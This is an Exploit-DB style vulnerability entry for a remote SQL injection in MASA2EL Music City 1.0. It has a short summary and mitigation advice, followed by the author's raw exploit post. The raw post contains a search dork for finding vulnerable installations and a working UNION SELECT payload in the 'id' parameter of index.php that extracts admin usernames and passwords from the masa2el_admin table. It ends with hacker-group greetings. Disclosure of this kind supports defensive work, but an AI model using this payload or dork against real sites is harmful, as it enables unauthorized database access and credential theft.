MASA2EL Music City Remote Sql Injection Vulnerability

vendor:

MASA2EL Music City

by:

alnjm33

CVSS

CRITICAL

SQL Injection

CWE

Product Name: MASA2EL Music City

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

MASA2EL Music City Remote Sql Injection Vulnerability

The MASA2EL Music City software is vulnerable to a remote SQL injection attack. An attacker can exploit this vulnerability by injecting malicious SQL queries into the 'id' parameter of the index.php file. This can lead to unauthorized access to the database and retrieval of sensitive information, such as usernames and passwords.

Mitigation:

To mitigate this vulnerability, developers should implement proper input validation and parameterized queries to prevent SQL injection attacks. Additionally, regular security audits and patches should be applied to the software.

Source

Exploit-DB raw data:

::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Exploit Title : MASA2EL Music City Remote Sql Injection Vulnerability
Author: alnjm33
Software Link: http://www.masa2el.com/index.php?go=dl&type=d&id=4
Tested on: Version 1.0
My home : Sec-war.com
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
==========================================Dork==========================================
                                 (Powered By : MASA2EL Music City 1.0 )
================================Exploit=============================================
http://server/path/index.php?go=singer&id=-13/**/union/**/select/**/1,concat(UserName,0x3a,PasSword),3,4/**/from/**/masa2el_admin--

=======================================================================================
Greetz to : First to The Best Team In Africa( Egypt Football TEAM ) PrEdAtOr -Sh0ot3R - xXx - Mu$L!m-h4ck3r - ahmadso - JaMbA - RoOt_EgY- jago-dz - XR57 all Sec-War.com members